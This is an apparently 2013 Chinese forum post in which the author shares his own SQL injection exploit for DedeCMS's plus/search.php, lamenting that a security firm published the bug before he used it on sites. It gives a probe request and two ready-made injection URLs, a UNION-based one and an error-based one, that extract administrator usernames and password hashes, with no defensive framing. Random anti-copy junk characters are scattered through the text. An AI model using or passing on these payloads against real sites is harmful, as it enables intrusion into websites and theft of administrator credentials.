转载不加作者名的没JJ
/ Z& T, M! g; @6 B9 {( g. ? M0 i' p: @& t( T6 P/ C
哎。没意识,我一个月前就发现了这个漏洞,一直也没去黑站 放那 现在狗卵的什么 知道创宇 发出来了。郁闷。。可惜了我的洞辛苦看了2天的dedecms漏洞就这样没了。/ q3 S! i! H* l' K }
6 b* J2 a, a- c+ F/ S0 |既然已经发出来了,我就把我自己搞的exp发下吧。。唉。
2 g, s9 S# i8 k- q
. S* |8 W; z6 D7 T/ U1 P我一般是这样测试的:( \. B9 k) \% W; L
6 C1 f! r, W/ D7 X& y6 p提交 xx.com/plus/search.php?keyword=as&typeArr[ uNion ]=a0 b: r5 E% `2 _& z7 C
# ]: P( i( ]" y$ I/ t
转载不加作者名的没JJ
1 q6 x7 e& `9 D2 j: h
/ U( d1 F7 k: l6 y$ R+ u作者:鬼哥
2 \1 H$ f: w/ `6 i2 M0 m* h
0 {) j0 ?2 A+ x
+ `3 ?& x) f8 {- L1 L
* }' G& R1 q+ V" i/ W+ @5 d看结果如果提示' z0 F J8 M5 b4 L
& Y5 Y* C% {/ h: w4 X+ cSafe Alert: Request Error step 2 !
" q! Y& J- b W; B+ M; C& S/ q
4 ^' _5 Q/ {) K# ?& q那么直接用下面的exp- v- R4 g8 ~ ]& { _) D
- R! @# v- u$ v; S6 Y3 jxx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a
) W) e+ }6 b. r1 J: e. k
7 Q0 M) l* N5 V' z: N1 S
4 G5 F1 [& i3 p0 y: q看结果如果提示
3 V6 @) V8 _% {
* m7 T. O3 b8 L5 @ R1 c' Z8 X# kSafe Alert: Request Error step 1 !
( p: z# \$ f1 Y) n
; B3 X j8 N7 o* u0 O那么直接用下面的exp
4 d1 F2 a7 w' N7 \# k( D U' ~! W( p* f* V5 T
xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a- ~+ c7 P2 O4 c m
8 e. I7 }8 n+ o8 A
. j4 w4 Q8 g) z( Y5 n& y3 y如果正常显示证明漏洞不存在了。1 |3 y- I$ b% V) c5 _' g. \
: u, e3 _% L( O3 W& O6 [
转载不加作者名的没JJ |
发表于 2013-1-21 08:45:22
收藏
支持
反对